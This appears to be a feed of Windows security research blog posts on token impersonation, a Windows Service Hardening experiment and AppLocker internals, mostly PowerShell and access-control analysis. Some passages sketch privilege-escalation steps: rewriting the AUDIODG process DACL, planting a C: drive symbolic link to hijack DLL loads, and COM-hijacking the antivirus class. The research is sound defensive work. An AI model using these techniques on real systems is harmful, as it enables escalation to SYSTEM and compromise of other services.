    The check is therefore, if the current Process Token's Authentication ID matches the Impersonation Token's OriginatingLogonSession ID then allow impersonation. Where is OriginatingLogonSession coming from? The value is set when an API such as LogonUser is used, and is set to the Authentication ID of the Token calling the API. This check allows a user to get back a Token and impersonate it even if it's a different user which would normally be blocked by the user check. Now what Token authenticates all new users? SYSTEM does, therefore almost every Token on the system has an OriginatingLogonSession value set to the Authentication ID of the SYSTEM user.

    Not convinced? We can test it from an admin PS shell. First create a SYSTEM PS shell from an Administrator PS shell using:

    PS> Start-Win32ChildProcess powershell

    Now in the SYSTEM PS shell check the current Token's Authentication ID (yes I know Pseduo is a typo ;-)).

    PS> $(Get-NtToken -Pseduo).AuthenticationId

    LowPart HighPart
    ------- --------
        999        0

    Next remove SeImpersonatePrivilege from the Token:

    PS> Remove-NtTokenPrivilege SeImpersonatePrivilege

    Now pick a normal user token, say from Explorer and dump the Origin.

    PS> $p = Get-NtProcess -Name explorer.exe
    PS> $t = Get-NtToken -Process $p -Duplicate
    PS> $t.Origin

    LowPart HighPart
    ------- --------
        999        0

    As we can see the Origin matches the SYSTEM Authentication ID. Now try and impersonate the Token and check what the resultant impersonation level assigned was:

    PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
    Impersonation

    We can see the final line shows the impersonation level as Impersonation. If we'd been blocked impersonating the Token it'd be set to Identification level instead.

    If you think I've made a mistake we can force failure by trying to impersonate a SYSTEM token but at a higher IL. Run the following to duplicate a copy of the current token, reduce IL to High then test the impersonation level.

    PS> $t = Get-NtToken -Duplicate
    PS> Set-NtTokenIntegrityLevel High
    PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
    Identification

    As we can see, the level has been set to Identification. If SeImpersonatePrivilege was being granted we'd have been able to impersonate the higher IL token as the privilege check is before the IL check.

    Is this ever useful? One place it might come in handy is if someone tries to sandbox the SYSTEM user in some way. As long as you meet all the requirements up to the Origin Session Check, especially IL, then you can still impersonate other users even if SeImpersonatePrivilege has been stripped away. This should work even in AppContainers or restricted tokens, as the check for sandbox tokens happens after the session check.

    The take away from this blog should be:

    • Removing SeImpersonatePrivilege from SYSTEM services is basically pointless.
    • Never try to create a sandboxed process which uses SYSTEM as the base token, as you can probably circumvent all manner of security checks including impersonation.



    Empirically Assessing Windows Service Hardening

    By: tiraniddo
    2 January 2020 at 02:26
    In the past few years there's been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege. What this means is given access to a suitable token handle of an administrator (say through the Rotten Potato attack) you can impersonate and elevate from a lower-privileged service account to SYSTEM. The problem for discoverers of these attacks is that Microsoft do not consider them something which needs to be fixed with a security bulletin, as having SeImpersonatePrivilege is basically a massive security hole. However MS go and fix them silently, making it unclear if they care or not.

    Of course, none of this is really new, Cesar Cerrudo detailed these sorts of service attacks in Token Kidnapping and Token Kidnapping's Revenge. The novel element recently is how to get hold of the access token, for example via negotiating local NTLM authentication. Microsoft seem to have been fighting this fire for almost 10 years and still have not gotten it right. In shades of UAC, a significant security push to make services more isolated and secure has been basically abandoned because (presumably) MS realized it was an indefensible boundary.

    That's not to say there haven't been interesting service account to SYSTEM bugs which Microsoft have fixed. The most recent example is CVE-2019-1322 which was independently discovered by multiple parties (DonkeysTeam, Ilias Dimopoulos and Edward Torkington/Phillip Langlois of NCC). To understand the bug you probably should read one of the write-ups (the NCC one is here) but the gist is, the Update Orchestrator Service has a service security descriptor which allowed "NT AUTHORITY\SERVICE" full access. It so happens that all system services, including lower-privileged ones, have this group and so you could reconfigure the service (which was running as SYSTEM) to point to any other binary, giving a direct service to SYSTEM privilege escalation.

    That begs the question, why was CVE-2019-1322 special enough to be fixed and not issues related to impersonation? Perhaps it's because this issue didn't rely on impersonate privileges being present? It is possible to configure services to not have impersonate privilege, so presumably if you could go from a non-impersonate service to an impersonate service that would count as a boundary? Again probably not, for example this bug which abuses the scheduled task service to regain impersonate privilege wouldn't likely be fixed by Microsoft.

    That lack of clarity is why I tweeted to Nate Warfield and ultimately to Matt Miller asking for some advice with respect to the MSRC Security Servicing Guidelines. The result is that even if the service doesn't have impersonate privilege it wouldn't be a defended boundary if all you get is the same user with additional privileges, as you can't block yourself from compromising yourself. This is the UAC argument over again, but IMO there's a crucial difference: Windows Service Hardening (WSH) was supposed to fix this problem for us in Vista. Unsurprisingly Cesar Cerrudo also did a presentation about this at the inaugural (maybe?) Infiltrate in 2011.

    The question I had was, is WSH still as broken as it was in 2011? Has anything changed which made WSH finally live up to its goal of making a service compromise not equal to a full system compromise? To determine that I thought I'd run an experiment on Windows 10 1909. I'm only interested in the features which WSH touches which led me to the following hypothesis:

    "Under Windows Service Hardening one service without impersonate privilege can't write to the resources of another service which does have the privilege, even if the same user, preventing full system compromise."

    The hypothesis makes the assumption that if you can write to another service's resources then it's possible to compromise that other service. If that other service has SeImpersonatePrivilege then that inevitably leads to full system compromise. Of course that's not necessarily the case, the resource being written to might be uninteresting, however as a proxy this is sufficient as the goal of WSH is to prevent one service modifying the data of another even though they are the same underlying user.

    WSH Details

    Before going into more depth on the experiment, let's quickly go through the various features of WSH and how they're expressed. If you know all this you can skip to the description of the experiment and the results.

    Limited Service Accounts and Reduced Privilege

    This feature is by far the oldest attempt to harden services, the introduction of the LOCAL SERVICE (LS) and NETWORK SERVICE (NS) accounts. Prior to the accounts' introduction there were only two ways of configuring the user for a system service on Windows: either the fully privileged SYSTEM account or creating a local/domain user which has the "Log on as a Service" right. The two accounts were introduced in XP SP2 (I believe) after worms such as Blaster basically got SYSTEM privilege through remotely attacking exposed services. The two service accounts are not administrator accounts which means they shouldn't be able to directly compromise the system. The accounts are very similar on Windows 10 1909; they are both assigned the following groups*:

    BUILTIN\Users
    CONSOLE LOGON
    Everyone
    LOCAL
    NT AUTHORITY\Authenticated Users
    NT AUTHORITY\LogonSessionId_X_Y
    NT AUTHORITY\SERVICE
    NT AUTHORITY\This Organization

    * Technically this isn't 100% accurate, on my machine the LS account has some extra capability groups, but we'll ignore those for this blog post.

    No Administrator group in sight. Each service token gets a unique Logon Session ID SID which will be important later. The service accounts also have a limited set of privileges, as shown below:

    SeAssignPrimaryTokenPrivilege
    SeAuditPrivilege
    SeChangeNotifyPrivilege
    SeCreateGlobalPrivilege
    SeImpersonatePrivilege
    SeIncreaseQuotaPrivilege
    SeIncreaseWorkingSetPrivilege
    SeShutdownPrivilege
    SeSystemTimePrivilege†
    SeTimeZonePrivilege
    SeUndockPrivilege

    † NETWORK SERVICE doesn't have SeSystemTimePrivilege.

    The two privileges I've highlighted, SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege, give these accounts effectively full system access when combined with a suitably privileged token. Part of WSH is also giving control over what privileges the service account actually requires. The default is to allow all privileges, however when configuring a service you can specify a list of privileges to restrict the service to. For example the CDPSvc service is configured to only require SeImpersonatePrivilege. Quite why they bother to put this restriction on the service I don't know ¯\_(ツ)_/¯.
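    As an aside, you can query or set this configuration with sc.exe (MyService is a made-up example here):

    PS> sc.exe qprivs CDPSvc
    PS> sc.exe privs MyService SeChangeNotifyPrivilege/SeTimeZonePrivilege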

    What's the difference between LS and NS? The primary difference is LS has no network credentials, so accessing network resources as that user would only succeed as an anonymous login. NS on the other hand is created with the credentials of the computer account and so can interact with the network for resources allowed by that authentication. This only really matters to domain joined machines, standalone machines would not share the computer account with anyone else.

    Per-Service SID

    The first big addition in WSH was the Per-Service SID. This SID is automatically added by the SCM to the list of default groups shown previously when creating the service's primary token. The service SID is also added with the SE_GROUP_OWNER flag set and is not mandatory, which means it can be set as the token's default owner when creating new resources and it can be disabled. The basic idea is a service can ACL its resources to this SID to prevent other services from accessing them. The use of a service SID is optional, but the majority of default services are configured to use it. An example SID for CDPSvc is as follows:

    S-1-5-80-3433512109-503559027-1389316256-1766580070-2256751264

    The SID is derived by generating a SHA1 hash of the service name and adding that as the SID's RIDs (with an extra 80 at the start to signify it's a service SID). The use of a hash should make it extremely unlikely two services would generate the same SID.
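    You can reproduce the derivation in a few lines of PowerShell. This is a sketch based on the documented algorithm (uppercase the name, SHA1 hash the UTF-16 bytes, then split the hash into five little-endian 32-bit RIDs):

    function Get-ServiceSid {
        param([string]$Name)
        # SHA1 hash of the upper-case UTF-16LE service name.
        $hash = [Security.Cryptography.SHA1]::Create().ComputeHash(
            [Text.Encoding]::Unicode.GetBytes($Name.ToUpperInvariant()))
        # The 20 byte hash becomes five little-endian DWORD RIDs.
        $rids = for ($i = 0; $i -lt 20; $i += 4) {
            [BitConverter]::ToUInt32($hash, $i)
        }
        "S-1-5-80-" + ($rids -join "-")
    }

    PS> Get-ServiceSid CDPSvc
    S-1-5-80-3433512109-503559027-1389316256-1766580070-2256751264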

    Of course it's up to the service to actually ACL their resources appropriately. To aid in that the token's default DACL is also configured to the following (for CDPSvc):

    - Type  : Allowed
    - Name  : NT AUTHORITY\SYSTEM
    - Access: Full Access

    - Type  : Allowed
    - Name  : OWNER RIGHTS
    - Access: ReadControl

    - Type  : Allowed
    - Name  : NT SERVICE\CDPSvc
    - Access: Full Access

    The three entries grant SYSTEM and the service SID full access to any resources with this DACL. It then limits the owner of the resource through OWNER RIGHTS to only READ_CONTROL access. This directly prevents one service account accessing the resources of another for write access. Unfortunately the default DACL is only applied when there's no other access control specified, either explicitly at creation time or due to inheritance. 

    One other thing to point out is that Windows still has shared services through the use of SVCHOST. If multiple services are registered in a specific SVCHOST instance then the SCM will create the token with all service SIDs in the group list and default DACL even if a service isn't currently loaded in the host. That has become less of an issue since Windows 1703; as long as you have greater than 3.5GB of RAM services will run in separate SVCHOST instances and all services will be totally separate.

    Write-Restricted Token

    The second big addition to WSH was the concept of Write-Restricted (WR) tokens. Restricted tokens have existed since Windows 2000 and are created using the NtFilterToken system call. The basic concept is the token can have a list of additional groups which are consulted whenever an access check is performed. First the access check is run on the default group list; if access would be granted, the access check is run again on the restricted SIDs. If the second check is successful then the access check passes, if not access is denied.

    Restricted tokens are used for sandboxing (such as in Chrome) but are difficult to set up correctly as they block all access equally, including reading critical files on disk. WR tokens solve the access problem by only blocking write access but leaving read and execute access alone.

    In order for a service configured as WR to write to a resource the associated security descriptor must contain the required access for one of the following restricted SIDs.

    Everyone
    NT AUTHORITY\LogonSessionId_X_Y
    NT AUTHORITY\WRITE RESTRICTED
    NT SERVICE\SERVICE_NAME

    The WRITE RESTRICTED SID is a special group SID which resources can apply if they expect a service to write to the resource. This SID is also added to the token's groups by the SCM so that it can be used to pass both checks. By combining service SIDs and WR the amount of resources a service can modify should be significantly reduced.
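    To get a feel for what such a token looks like you can build one yourself. A sketch using NtObjectManager (the Get-NtToken -Filtered parameter names are from memory, so double check them; FakeService and the Get-ServiceSid helper come from earlier in this post):

    # Everyone (S-1-1-0) and WRITE RESTRICTED (S-1-5-33) plus a service SID;
    # the real SCM token also gets the logon session SID.
    $rsids = "S-1-1-0", "S-1-5-33", (Get-ServiceSid FakeService) |
        ForEach-Object { Get-NtSid -Sddl $_ }
    $token = Get-NtToken -Filtered -RestrictedSids $rsids -Flags WriteRestricted
    $token.Restricted    # Should print True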

    And the Rest

    There's a few things which are technically part of service hardening which we won't really consider for the experiment:

    The main one is additional rules in the firewall to block network services or requests being made from a service. This is arguably more to prevent remote compromise than it is to prevent cross-service attacks. 

    Another is Session 0 Isolation and System Integrity Level. Session 0 Isolation was introduced to prevent Shatter Attacks, by preventing any windows being created by a service on the same desktop as a normal user. System Integrity Level through UIPI then prevents attacks even if the service did create a window on a normal user desktop as it'd be at a much higher IL (even than Administrators). The System IL does admittedly also have a security access check function but it's not that important for cross-service attacks.

    Experiment Procedure

    On to the experiment itself. Based on the hypothesis I presented earlier the goal is to determine if you can write to resources of one service from another service even though they're the same user. To make this testable I decided on the following procedure:

    Step 1: Build an access token for a service which doesn't exist on the system.
    Step 2: Enumerate all resources of a specific type which are owned by the token owner and perform an access check using the token.
    Step 3: Collate the results based on the type of resource and whether write access was granted.

    The reason for choosing to build a token for a non-existent service is it ensures we should only see the resources that could be shared by other services as the same user, not any resources which are actually designed to be accessible by being created by a service. These steps need to be repeated for different access tokens; we'll use the following five:
    • LOCAL SERVICE
    • LOCAL SERVICE, Write Restricted
    • NETWORK SERVICE
    • NETWORK SERVICE, Write Restricted
    • Control
    We'll test both normal service SID and WR versions of the access token to see if it makes much of a difference. One thing to determine is what to use as a control. Ideally the control would be another service account with WSH disabled. However I couldn't find a way to disable WSH entirely to do this test, so instead we need some other control. If our hypothesis holds and WSH is effective we'd expect no resources to be writable, therefore we need to pick a control account where we know this is not true. The easiest is just to use the current logged on user account, it should be able to access almost all its own resources.

    What resources do we want to inspect? The obvious type is Process/Thread resources. Getting write access to either of these in another service is probably a trivial route to full system compromise through impersonation. We'd want to get a bigger picture however; it'd be useful to include Files, Registry keys and Named Kernel Objects. These resources might not directly lead to compromise but it does give us a general idea of the maximum impact.

    It's worth noting that the hypothesis made a point to specify writing to the resources of a service which has impersonate privilege from one which does not. However this experimental process will only base the analysis on whether the resource is owned by the service user. This is intentional, it'd be too complex to attribute the resource to a specific service in all cases. However an assumption is made that more services running as a specific user have impersonate privilege than do not, therefore in all probability any resource you can write to is probably owned by one of them. We could verify that assumption if we liked, but I'll probably not.

    Finally, a good experiment should be something which can be repeatable and verifiable. To that end I'll provide all the code necessary to perform the steps, written in PowerShell and using my NtObjectManager module. If you want to re-run the experiment you should be able to do so and produce a very similar set of results.

    Experiment Procedure Detail

    On to the specific PowerShell steps to perform the experiment. First off you'll need my NtObjectManager module, specifically at least version 1.1.25 as I've added a few extra commands to simplify the process. You will also need to run all the commands as the SYSTEM user; some commands will need it (such as getting access tokens), others benefit from the elevated privileges. From an admin command prompt you can create a SYSTEM PowerShell console using the following command:

    Start-Win32ChildProcess -RequiredPrivilege SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege powershell

    This command will find a SYSTEM process to create the new process from which also has, at a minimum, the specified list of privileges. Due to the way the process is created it'll also have full access to the current desktop so you can spawn GUI applications running at system if you need them.

    The experiment will be run on a VM of Windows 1909 Enterprise updated to December 2019 from a split-token admin user account. This just ensures the minimum amount of configuration changes and additional software is present. Of course there's going to be variability on the number of services running at any one time, there's not a lot which can be done about that. However it's expected that the results should be the same even if the individual resources available are not. If you were concerned you could rerun the experiment on multiple different installs of Windows at different times of day and aggregate the results.

    Creating the Access Tokens

    We need to create 5 access tokens for the test. Ideally we'd like to create the four service tokens using the exact method used by the SCM. We could register our unknown service and start the service to steal its token. There is also an undocumented RGetServiceProcessToken SCM RPC method in newer versions of Windows 10. However I think creating a service risks some resources being populated with that service's identity which might not be what we really want. Instead we can use LogonUserExExW which is what the SCM uses, with the LOGON32_LOGON_SERVICE type to create LS and NS tokens. This will work as long as we have SeTcbPrivilege. We'll then just add the appropriate groups, convert to WR,  and remove privileges as necessary. We can get to the LogonUserExExW API using Get-NtToken. I've wrapped up everything into a function Get-ServiceToken, you can see the full function in the final script. Using this function we can create all the tokens we need using the following commands:

    $tokens = @()
    $tokens += Get-ServiceToken LocalService FakeService
    $tokens += Get-ServiceToken LocalService FakeService -WriteRestricted
    $tokens += Get-ServiceToken NetworkService FakeService
    $tokens += Get-ServiceToken NetworkService FakeService -WriteRestricted

    For the control token we'll get the unmodified session access token for the current desktop. Even though we're running as SYSTEM, as we're running on the same desktop we can just use the following command:

    $tokens += Get-NtToken -Session -Duplicate

    Random note. When calling LogonUserExExW and requesting a service SID as an additional group the call will fail with access denied. However this only happens if the service SID is the first NT Authority SID in the additional groups list. Putting any other NT Authority SID, including our new logon session SID before the service SID makes it work. Looking at the code in LSASRV (possibly the function LsapCheckVirtualAccountRestriction) it looks like the use of a service SID should be restricted to the first process (based on its PID) that used a service SID which would be the SCM. However if another NT Authority SID is placed first the checking loop sets a boolean flag which prevents the loop checking any more SIDs and so the service SID is ignored. I've no idea if this is a bug or not, however as you need TCB privilege to set the additional groups I don't think it's a security issue.

    Resource Checking and Result Collation

    With the 5 tokens in hand we can progress to assessing accessible resources. The original purpose of my Sandbox Analysis tools was finding accessible resources from a sandbox process, however the same code is capable of finding resources accessible from any access token, including service tokens.

    First as way of example lets run checks for process and threads:

    $ps = Get-AccessibleProcess -Tokens $tokens `
        -CheckMode ProcessOnly -AllowEmptyAccess
    $ts = Get-AccessibleProcess -Tokens $tokens `
        -CheckMode ThreadOnly -AllowEmptyAccess

    We can pass a list of tokens to the checking command; this improves performance as we only enumerate the resources once and then perform the access check for each token. Each generated access result has a TokenId property which indicates the unique ID of the token which was used for the check, this allows us to extract the correct results later. We also specify the AllowEmptyAccess option, which will generate a result even if the access check fails and the token has no access to the resource. This will be useful to allow us to assess what resources are owned by the token's owner SID but which we were not granted access to.

    Let's do the rest of the resources:

    $os = Get-AccessibleObject \ -Recurse `
        -Tokens $tokens -AllowEmptyAccess
    $fs = Get-AccessibleFile -Win32Path "$env:SystemDrive\" `
        -FormatWin32Path -Recurse -Tokens $tokens -AllowEmptyAccess
    $ks = Get-AccessibleKey \Registry -FormatWin32Path -Recurse `
        -Tokens $tokens -AllowEmptyAccess

    We'll only get the accessible files on the system drive in this case as that'll be the only drive in the VM. Note that Get-AccessibleObject doesn't check ALPC ports, as it's not possible to open an ALPC port by name and read its security descriptor. We'll ignore ALPC ports for this experiment, as it's probably worthy of a topic all on its own.

    We now have all the results we need in five variables along with the tokens. If you want to run it yourself the final script is on Github here. It'll take a fair amount of time to run but once it's complete you'll find 5 CSV files in the current directory containing the results for each token.

    Experiment Results

    We now need to do our basic analysis of the results. Let's start with calculating the percentage of writable resources for each token type relative to the total number of resources. From my single experiment run I got the following table:

    Token             Writable   Writable (WR)   Total
    Control           99.83%     N/A             13171
    Network Service   65.00%     0.00%           300
    Local Service     62.89%     0.70%           574

    As we expected the control token had almost 100% of the owned resources writable by the user. However both service accounts had over 60% of their owned resources writable when using an unrestricted token. That level is almost completely eliminated when using a WR token: there were no writable resources for NS and only 4 resources writable from LS, which was less than 1%. Those 4 resources were just Events, from a service perspective not very exciting, though they were ACL'ed to Everyone which is unusual.

    Just based on these numbers alone it would seem that WSH really is a failure when used unrestricted but is probably fine when used in WR mode. It'd be interesting to dig into what types are writable in the unrestricted mode to get a better understanding of where WSH is failing. This is what I've summarized in the following table:

    Type           LS Writable%   LS Writable   NS Writable%   NS Writable
    Directory      0.28%          1             0.51%          1
    Event          1.66%          6             0.51%          1
    File           74.24%         268           48.72%         95
    Key            22.44%         81            49.23%         96
    Mutant         0.28%          1             0.51%          1
    Process        0.28%          1             0.00%          0
    Section        0.55%          2             0.00%          0
    SymbolicLink   0.28%          1             0.51%          1
    Thread         0.00%          0             0.00%          0

    The clear winners, if there is such a thing, are Files and Registry Keys, taking up over 95% of the resources which are writable. Based on what we know about how WSH works this is understandable. The likelihood is any keys/files are getting their security through inheritance from the parent container. This will typically result in at least the owner field being the service account granted WRITE_DAC access, or the inherited DACL will contain a CREATOR OWNER SID which results in explicit access for the service account.

    What is perhaps more interesting are the results for Processes and Threads: neither NS nor LS has any writable threads, and only LS has a single writable process. The primary reason for the lack of writable threads and processes is the default DACL which is used for new processes when an explicit DACL isn't specified. The DACL has an OWNER RIGHTS SID granted only READ_CONTROL access; the result is that even if the owner of the resource is the service account it isn't possible to write to it. The only way to get full access as per the default DACL is by having the specific service SID in your group list.

    Why does LS have one writable process? This I think is probably a "bug" in the Audio Service which creates the AUDIODG process. If we look at the security descriptor of the AUDIODG process we see the following:

    <Owner>
     - Name  : NT AUTHORITY\LOCAL SERVICE

    <DACL>
     - Type  : Allowed
     - Name  : NT SERVICE\Audiosrv
     - Access: Full Access

     - Type  : Allowed
     - Name  : NT AUTHORITY\Authenticated Users
     - Access: QueryLimitedInformation

    The owner is LS which will grant WRITE_DAC access to the resource if nothing else is in the DACL to stop it. However the default DACL's OWNER RIGHTS SID is missing from the DACL, which means this was probably set explicitly by the Audio Service to grant Authenticated Users query access. This results in the access not being correctly restricted from other service accounts. Of course AUDIODG has SeImpersonatePrivilege so if you find yourself inside an LS unrestricted process with no impersonate privilege you can open AUDIODG (if running) for WRITE_DAC, change the DACL to grant full access and get back impersonate privileges.
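    As a quick sketch of that last attack using NtObjectManager (assuming you're in such an LS process and AUDIODG is running; the SDDL string is just an example grant):

    # Open AUDIODG for WRITE_DAC, which the LS owner gets implicitly...
    $p = Get-NtProcess -Name audiodg.exe -Access WriteDac
    # ...then rewrite the DACL to grant LOCAL SERVICE full access.
    Set-NtSecurityDescriptor $p (New-NtSecurityDescriptor -Sddl "D:(A;;GA;;;LS)") Dacl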

    If you look at the results one other odd thing you'll notice is that while there are readable threads there are no readable processes. What's going on? If we look at a normal LS service process' security descriptor we see the following:

    <Owner>
     - Name  : NT AUTHORITY\LogonSessionId_0_202349

    <DACL>
     - Type  : Allowed
     - Name  : NT AUTHORITY\LogonSessionId_0_202349
     - Access: Full Access

     - Type  : Allowed
     - Name  : BUILTIN\Administrators
     - Access: QueryInformation|QueryLimitedInformation

    We should be able to see the reason: the owner is not LS, but instead the logon session SID which is unique per-service. This blocks other LS processes from having any access rights by default. Then the DACL only grants full access to the logon session SID; even administrators are apparently not to be trusted (though they can typically just bypass this using SeDebugPrivilege). This security descriptor is almost certainly set explicitly by the SCM when creating the process.

    Is there anything else interesting in writable resources outside of the files and keys? The one interesting result shared between NS and LS is a single writable Object Directory. We can take a look at the results to find out what directories these are, to see if they share any common purpose. The directory paths are \Sessions\0\DosDevices\00000000-000003e4 for NS and \Sessions\0\DosDevices\00000000-000003e5 for LS. These are the service account's DOS Device directory, the default location to start looking up drive mappings. As the accounts can write to their respective directory this gives another angle of attack: you can compromise any service process running as the same user by dropping a mapping for the C: drive and waiting for the process to load a DLL. Leaving that angle open seems sloppy, but it's not like there are no alternative routes to compromise another service.
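    A sketch of that drive mapping trick using NtObjectManager (the LUID suffix of the directory is per-logon and the target volume path is illustrative, so don't expect these exact values to work):

    # From a compromised LS process: redirect C: for every other LS service.
    New-NtSymbolicLink "\Sessions\0\DosDevices\00000000-000003e5\C:" "\Device\HarddiskVolume2\FakeRoot"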

    I think that's the limit of my interest in analysis. I've put my results up on Google Drive here if you want to play around yourself.

    Conclusions

    Even though I've not run the experiment on multiple machines, at different times with different software, I think I can conclude that WSH does not provide any meaningful security boundary when used in its default unrestricted mode. Based on the original hypothesis we can clearly write to resources not created by our service and therefore could likely fully compromise the system. The implementation does do a good job of securing process and thread resources, which would otherwise provide trivial elevation routes, but even that can be easily circumvented if there are appropriate processes running (including some COM services). I can fully support this not being something MS would want to defend through issuing bulletins.

    However when used in WR mode WSH is much more comprehensive. I'd argue that as long as a service doesn't have impersonate privilege then it's effectively sandboxed if running with a WR token. MS already support sandbox escapes as a defended boundary so I'm not sure why WR sandboxes shouldn't also be included as part of that. For example if the trick using the Task Scheduler worked from a WR service I'd see that as circumventing a security boundary; however I don't work in MSRC so I have no influence on what is or is not fixed.

    Of course in an ideal world you wouldn't use shared accounts at all. Versions of Windows since 7 have support for Virtual Service Accounts where the service user is the service SID rather than a standard service account and the SCM even limits the service's IL to High rather than System. Of course by default these accounts still have impersonate privilege, however you could also remove that.

    The Mysterious Case of a Broken Virus Scanner

    By: tiraniddo
    6 December 2019 at 03:08
    On the VM (a default Windows 10 1909 install) I used for my AppLocker series, I wanted to test out the new Edge. I opened the old Edge and tried to download the canary installer, however the download failed; Edge said the installer had a virus and it'd been deleted. How rude! I also tried the download in Chrome on the same machine with the same result, even ruder!

    Downloading Edge Canary in Edge with AppLocker. Shows a bar that the download has been deleted because it's a virus.

    Oddly it worked if I turned off DLL Rule Enforcement, but not when I enabled it again. My immediate thought was that the virus checking was trying to map the executable and somehow hitting the DLL verification callback and failing, as the file was in my Downloads folder which is not in the default rule set. That seemed pretty unlikely, however clearly something was being blocked from running. Fortunately AppLocker maintains an Audit Log under "Applications and Services Logs -> Microsoft -> Windows -> AppLocker -> EXE and DLL" so we can quickly diagnose the failure.

    Failing DLL load in audit log showing it tried to load %OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL

    The failing DLL load was for "%OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL". This makes sense, the default rules only permit %WINDOWS% and %PROGRAMFILES% for normal users, however %OSDRIVE%\ProgramData is not allowed. This is intentional as you don't want to grant access to locations a normal user could write to, so generally allowing all of %ProgramData% would be asking for trouble. [update:20191206] of course this is known about (I'm not suggesting otherwise), AaronLocker should allow this DLL by default.

    I thought it'd at least be interesting to see why it fails and what MPOAV is doing. As the same failure occurred in both Edge (I didn't test IE) and Chrome it was clearly some common API they were calling. As Chrome is open source it made more sense to look there. Tracking down the resource string for the error led me to this code. The code was using the Attachment Services API, which is a common interface to verify downloaded files and attachments, apply MOTW and check for viruses.

    When the IAttachmentExecute::Save method is called the file is checked for viruses using the currently registered anti-virus COM object which implements the IOfficeAntiVirus interface. The implementation for that COM class is in MPOAV.DLL, which as we saw is blocked so the COM object creation fails. And a failure to create the object causes the Save method to fail and the Attachment Services code to automatically delete the file so the browser can't even do anything about it such as ask the user. Ultra rude!

    You might wonder how this COM class is registered? An implementor needs to register their COM object with a Category ID of "{56FFCC30-D398-11d0-B2AE-00A0C908FA49}". If you have OleViewDotNet setup (note there are other tools) you can dump all registered classes using the following PowerShell command:

    Get-ComCategory -CatId '56FFCC30-D398-11d0-B2AE-00A0C908FA49' | Select -ExpandProperty ClassEntries

    On a default installation of Windows 10 you should find a single class, "Windows Defender IOfficeAntiVirus implementation", registered which is implemented in the MPOAV DLL. We can try and create the class with DLL enforcement enabled to convince ourselves that's the problem:

    PowerShell error when creating MSOAV COM object. Fails with AppLocker policy block error.

    No doubt this has been documented before (and I've not looked [update:20191206] of course Hexacorn blogged about it) but you could probably COM hijack this class (or register your own) and get notified of every executable downloaded by the user's web browser. Perhaps even backdoor everything. I've not tested that however ;-)

    This issue does demonstrate a common weakness with any application allow-listing solution. You've got to add a rule to allow this (probably undocumented) folder in your DLL rules. Or you could allow-list all Microsoft Defender certificates I suppose. Potentially both of these criteria could change and you end up having to fix random breakage which wouldn't be fun across a large fleet of machines. It also demonstrates a weird issue with attachment scanning, if your AV is somehow misconfigured things will break and there's no obvious reason why. Perhaps we need to move on from using outdated APIs to do this process or at least handle failure better.

    The Internals of AppLocker - Part 4 - Blocking DLL Loading

    By: tiraniddo
    21 November 2019 at 06:42
    This is part 4 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 3 here. As I've mentioned before this is how AL works on Windows 10 1909, it might differ on other versions of Windows.

    In the first three parts of this series I covered the basics of how AL blocked process creation. We can now tackle another, optional component, blocking DLL loading. If you dig into the Group Policy Editor for Windows you will find a fairly strong warning about enabling DLL rules for AL:

    Warning text on DLL rules stating that enabling them could affect system performance.

    It seems MS doesn't necessarily recommend enabling DLL blocking rules, but we'll dig in anyway as I can't find any official documentation on how it works and it's always interesting to better understand how something works before relying on it.

    We know from part 1 that there's a policy for DLLs in the DLL.Applocker file. We might as well start with dumping the Security Descriptor from the file using the Format-AppLockerSecurityDescriptor function from part 3, to check it matches our expectations. The DACL is as follows:

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "%WINDIR%\*"

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

     - Type  : AllowedCallback
     - Name  : BUILTIN\Administrators
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "*"

     - Type  : Allowed
     - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
     - Access: Execute|ReadAttributes|ReadControl|Synchronize

     - Type  : Allowed
     - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
     - Access: Execute|ReadAttributes|ReadControl|Synchronize

    Nothing shocking here, just our rules written out in a security descriptor. However it gives us a hint that perhaps some of the enforcement is being done inside the kernel driver. Unsurprisingly if you look at the names in APPID you'll find a function called SrpVerifyDll. There's a good chance that's our target to investigate.

    By chasing references you'll find the SrpVerifyDll function being called via a Device IO control code to a device object exposed by the APPID driver (\Device\SrpDevice). I'll save you the effort of reverse engineering, as it's pretty routine. The control code and input/output structures are as follows:

    // 0x225804
    #define IOCTL_SRP_VERIFY_DLL CTL_CODE(FILE_DEVICE_UNKNOWN, 1537, \
                METHOD_BUFFERED, FILE_READ_DATA)

    struct SRP_VERIFY_DLL_INPUT {
        ULONGLONG FileHandle;
        USHORT FileNameLength;
        WCHAR FileName[ANYSIZE_ARRAY];
    };

    struct SRP_VERIFY_DLL_OUTPUT {
        NTSTATUS VerifyStatus;
    };

    Looking at SrpVerifyDll itself there's not much to really note. It's basically very similar to the verification done for process creation I described in detail in part 2 and 3:
    1. An access check token is captured and duplicated. If the token is restricted query for the logon session token instead.
    2. The token is checked whether it can bypass policy by being SANDBOX_INERT or a service.
    3. Security attributes are gathered using AiGetFileAttributes on the passed in file handle.
    4. Security attributes set on token using AiSetTokenAttributes.
    5. Access check performed using policy security descriptor and status result written back to the Device IO Control output.
    It makes sense that the security attributes have to be recreated, as the access check needs the information about the DLL being loaded, not the original executable. Even though a file name is passed in the input structure, as far as I can tell it's only used for logging purposes.

